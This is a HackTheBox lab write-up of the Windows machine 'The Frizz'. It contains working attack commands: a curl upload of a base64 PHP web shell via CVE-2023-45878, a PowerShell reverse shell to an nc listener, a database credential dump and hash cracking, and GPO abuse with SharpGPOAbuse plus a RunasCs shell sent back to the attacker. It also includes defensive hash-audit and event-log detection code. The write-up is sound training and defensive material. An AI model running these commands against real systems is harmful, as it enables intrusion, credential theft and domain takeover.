Overview
The Frizz is a Windows machine on HackTheBox rated Medium. It's a full Active Directory attack chain: from exploiting a CVE in Gibbon LMS for initial access, through Kerberos authentication with cracked credentials, to domain admin via GPO abuse with SharpGPOAbuse.
| Property | Value |
|---|---|
| OS | Windows (AD Domain Controller) |
| IP | 10.10.11.60 |
| Domain | frizz.htb / frizzdc.frizz.htb |
| Difficulty | Medium |
| Key Techniques | CVE-2023-45878, Kerberos Auth, Hash Cracking, GPO Abuse |
Enumeration
Port Scan
The nmap scan reveals a typical Active Directory Domain Controller:
| Port | Service | Version |
|---|---|---|
| 22/tcp | SSH | OpenSSH for Windows 9.5 |
| 53/tcp | DNS | Simple DNS Plus |
| 80/tcp | HTTP | Apache httpd 2.4.58 (PHP/8.2.12) |
| 88/tcp | Kerberos | Microsoft Windows Kerberos |
| 135/tcp | MSRPC | Microsoft Windows RPC |
| 139/tcp | NetBIOS | Microsoft Windows netbios-ssn |
| 389/tcp | LDAP | Active Directory LDAP (Domain: frizz.htb0) |
| 445/tcp | SMB | Microsoft-DS |
| 464/tcp | kpasswd5 | |
| 593/tcp | ncacn_http | RPC over HTTP 1.0 |
| 636/tcp | tcpwrapped | |
| 3268/tcp | LDAP | Global Catalog |
Add to /etc/hosts, with the DC's FQDN listed first (the order matters for Kerberos later):
10.10.11.60 frizzdc.frizz.htb frizz.htb
The web server on port 80 redirects to http://frizzdc.frizz.htb/home/, running Gibbon LMS — an open-source school management platform.
Foothold
CVE-2023-45878 — Gibbon LMS File Upload
Gibbon LMS is vulnerable to an arbitrary file upload via the rubrics module (CVE-2023-45878). The vulnerable endpoint accepts POST requests with a crafted image parameter containing a base64-encoded PHP shell:
curl -v -X POST \
"http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"
The base64 payload decodes to a simple PHP web shell. Once uploaded, it's accessible at:
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=<command>
Reverse Shell via PowerShell
Generate a base64-encoded PowerShell reverse shell with revshells.com, start a listener with nc -lvnp 9001, and trigger the payload through the cmd parameter of the PHP web shell.
Credential Extraction
MySQL Database Access
The Gibbon LMS configuration file (config.php) contains MySQL credentials:
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!!?1';
$databaseName = 'gibbon';
Querying the database for user credentials:
.\mysql.exe -h localhost -u MrGibbonsDB -pMisterGibbs!Parrot!!?1 -D gibbon -e "SELECT username, passwordStrong, passwordStrongSalt FROM gibbonPerson;"
This reveals the salted hash (passwordStrong) and salt (passwordStrongSalt) for f.frizzle:
f.frizzle  067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03  /aACFhikmNopqrRTVz2489
Hash Cracking with Hashcat
The hash is SHA-256 over the salt followed by the password (hashcat mode 1420, sha256($salt.$pass)). Create hash.txt in hash:salt format:
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489
hashcat -m 1420 -a 0 hash.txt rockyou.txt
Result: Jenni_Luvs_Magic23
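As an added illustration (not code from the writeup or from Gibbon itself), the scheme behind mode 1420: the stored passwordStrong is SHA-256 over salt followed by password, so the defender-side routine below both verifies a login attempt and audits a stored row against a banned-password list. The demo row is constructed, reusing only the salt shape from the table above.

```python
import hashlib
import secrets
from typing import Iterable, Optional


def gibbon_hash(salt: str, password: str) -> str:
    # passwordStrong = hex(SHA-256(salt || password)): salt first, then password,
    # which is exactly what hashcat mode 1420 (sha256($salt.$pass)) computes.
    return hashlib.sha256((salt + password).encode("utf-8")).hexdigest()


def verify(stored_hash: str, salt: str, candidate: str) -> bool:
    # What a login check should do: recompute and compare in constant time.
    return secrets.compare_digest(gibbon_hash(salt, candidate), stored_hash)


def hashcat_line(stored_hash: str, salt: str) -> str:
    # The hash:salt line hashcat -m 1420 expects, built from the two DB columns.
    return f"{stored_hash}:{salt}"


def audit_weak_password(stored_hash: str, salt: str, denylist: Iterable[str]) -> Optional[str]:
    # Defender-side audit of one gibbonPerson row against a banned-password list.
    # A per-user salt defeats precomputed tables but costs only one SHA-256 per
    # guess, which is why a weak password still falls to a wordlist.
    for word in denylist:
        if verify(stored_hash, salt, word):
            return word
    return None


# Constructed demo row (not the box's real hash); the salt has the same length
# and alphabet as the one in the table above.
DEMO_SALT = "/aACFhikmNopqrRTVz2489"
DEMO_HASH = gibbon_hash(DEMO_SALT, "Jenni_Luvs_Magic23")
DENYLIST = ["password", "Welcome1", "Jenni_Luvs_Magic23"]

if __name__ == "__main__":
    print(hashcat_line(DEMO_HASH, DEMO_SALT))
    print("banned password in use:", audit_weak_password(DEMO_HASH, DEMO_SALT, DENYLIST))
```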
User summary:
| Field | Value |
|---|---|
| Username | f.frizzle |
| Full Name | Fiona Frizzle |
| Email | f.frizzle@frizz.htb |
| Password | Jenni_Luvs_Magic23 |
Kerberos Authentication
Since this is an Active Directory environment, we authenticate via Kerberos to get an SSH session.
Time Synchronization
Kerberos requires clock sync within 5 minutes of the DC. Disable NTP and sync manually:
sudo systemctl stop ntpsec
sudo systemctl disable ntpsec
sudo rdate -n 10.10.11.60
Configure /etc/krb5.conf
[libdefaults]
    default_realm = FRIZZ.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = true
    ticket_lifetime = 24h
    renew_lifetime = 7d
    forwardable = true
    proxiable = true

[realms]
    FRIZZ.HTB = {
        kdc = frizzdc.frizz.htb
        admin_server = frizzdc.frizz.htb
        default_domain = frizz.htb
    }

[domain_realm]
    .frizz.htb = FRIZZ.HTB
    frizz.htb = FRIZZ.HTB
Get TGT and SSH
getTGT.py frizz.htb/f.frizzle
# Enter password: Jenni_Luvs_Magic23
# [*] Saving ticket in f.frizzle.ccache
export KRB5CCNAME=f.frizzle.ccache
ssh -o GSSAPITrustDNS=no -o GSSAPIAuthentication=yes f.frizzle@frizz.htb
Important: in the /etc/hosts entry, frizzdc.frizz.htb must come before frizz.htb. The first name on a hosts line is the canonical hostname, and the GSSAPI client builds the service principal host/<canonical name>@FRIZZ.HTB from it; with frizz.htb first, ssh asks for a ticket for host/frizz.htb, which the DC does not hold, and Kerberos authentication fails.
User flag obtained.
Privilege Escalation
Lateral Movement — M.SchoolBus
While authenticated as f.frizzle, we discover another user: M.SchoolBus. A 7z archive in the Recycle Bin contains this user's credentials:
m.schoolbus:!suBcig@MehTed!R
This user has WriteGPLink permissions over Class_FRIZZ and DOMAIN CONTROLLERS — a path to domain admin via GPO abuse.
GPO Abuse with SharpGPOAbuse
The attack chain:
- Create a new GPO:
New-GPO -Name "doesnotmatter"
- Link it to Domain Controllers:
New-GPLink -Name "doesnotmatter" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
- Add M.SchoolBus as local admin via SharpGPOAbuse:
.\SharpGPOAbuse.exe -AddLocalAdmin -UserAccount M.SchoolBus -GPOName doesnotmatter
- Force group policy update:
gpupdate /force
- Get an admin shell with RunasCs (the -r option sends the process's input and output to the attacker's listener):
.\RunasCs.exe "M.SchoolBus" '!suBcig@MehTed!R' powershell.exe -r 10.10.14.242:9001
Alternatively, authenticate as M.SchoolBus via Kerberos:
getTGT.py frizz.htb/m.schoolbus
export KRB5CCNAME=m.schoolbus.ccache
ssh -o GSSAPITrustDNS=no -o GSSAPIAuthentication=yes m.schoolbus@frizz.htb
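The chain above leaves a distinctive trail in the DC's Security log: a groupPolicyContainer creation (event 5137) followed by a gPLink value added on the Domain Controllers OU (event 5136), both by the same account. The detection below is an added example, not code from the writeup or from SharpGPOAbuse; the events are constructed, the GPO GUIDs are made up, and the field names follow the EventData of those two events as a log shipper flattens them.

```python
import re

# Constructed Security-log events (not from the box), flattened the way a log
# shipper presents EventData for 5137 (object created) and 5136 (object modified).
# Recording them needs the "Directory Service Changes" audit subcategory and a
# SACL on the OU and on the Policies container.
DC_OU = "OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB"
VALUE_ADDED = "%%14674"  # 5136 OperationType code for "Value Added"
GPO = "CN={11111111-2222-3333-4444-555555555555},CN=Policies,CN=System,DC=frizz,DC=htb"  # made-up GUID
EVENTS = [
    {"EventID": 5137, "SubjectUserName": "M.SchoolBus",
     "ObjectClass": "groupPolicyContainer", "ObjectDN": GPO},
    {"EventID": 5136, "SubjectUserName": "M.SchoolBus",
     "ObjectDN": "OU=Domain Controllers,DC=frizz,DC=htb",
     "AttributeLDAPDisplayName": "gPLink", "OperationType": VALUE_ADDED,
     "AttributeValue": f"[LDAP://{GPO};0]"},
    {"EventID": 5136, "SubjectUserName": "Administrator",  # benign: not the DC OU
     "ObjectDN": "OU=Class_FRIZZ,DC=frizz,DC=htb",
     "AttributeLDAPDisplayName": "gPLink", "OperationType": VALUE_ADDED,
     "AttributeValue": "[LDAP://CN={99999999-8888-7777-6666-555555555555},CN=Policies,CN=System,DC=frizz,DC=htb;0]"},
]
LINK_RE = re.compile(r"\[LDAP://([^;\]]+);(\d)\]", re.IGNORECASE)


def linked_gpos(gplink_value):
    # gPLink holds zero or more "[LDAP://<gpo dn>;<flags>]" entries back to back.
    return [dn.lower() for dn, _flags in LINK_RE.findall(gplink_value)]


def gplink_alerts(events):
    # Pass 1: who created each groupPolicyContainer (event 5137).
    creators = {e["ObjectDN"].lower(): e["SubjectUserName"] for e in events
                if e.get("EventID") == 5137 and e.get("ObjectClass") == "groupPolicyContainer"}
    alerts = []
    for e in events:
        # Pass 2: any gPLink value added on the Domain Controllers OU is alerted,
        # because a GPO linked there applies to every DC.
        if (e.get("EventID") != 5136 or e.get("AttributeLDAPDisplayName") != "gPLink"
                or e.get("OperationType") != VALUE_ADDED
                or not e["ObjectDN"].upper().endswith(DC_OU)):
            continue
        for gpo in linked_gpos(e["AttributeValue"]):
            alerts.append({"actor": e["SubjectUserName"], "gpo": gpo,
                           # same account created and linked it: the New-GPO / New-GPLink pattern
                           "created_by_actor": creators.get(gpo) == e["SubjectUserName"]})
    return alerts


if __name__ == "__main__":
    print(gplink_alerts(EVENTS))
```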
Root Flag
PS C:\Users\Administrator\Desktop> cat root.txt
0beb123688935a9a16f6b133817f42b5
Attack Summary
Key Takeaways
- Gibbon LMS CVE-2023-45878 is a critical file upload vulnerability. Always keep web applications patched, especially on domain-joined servers.
- Salted hashes are only as strong as the password. SHA-256 with a salt still falls to rockyou.txt if the password is weak.
- Kerberos authentication requires careful setup (time sync, krb5.conf, correct /etc/hosts order) but is the standard way to interact with AD environments.
- GPO abuse via WriteGPLink is a powerful AD escalation path. If a user can link GPOs to the Domain Controllers OU, they can effectively become domain admin through SharpGPOAbuse.
- Always check the Recycle Bin. Deleted files often contain credentials, configuration files, or other sensitive data.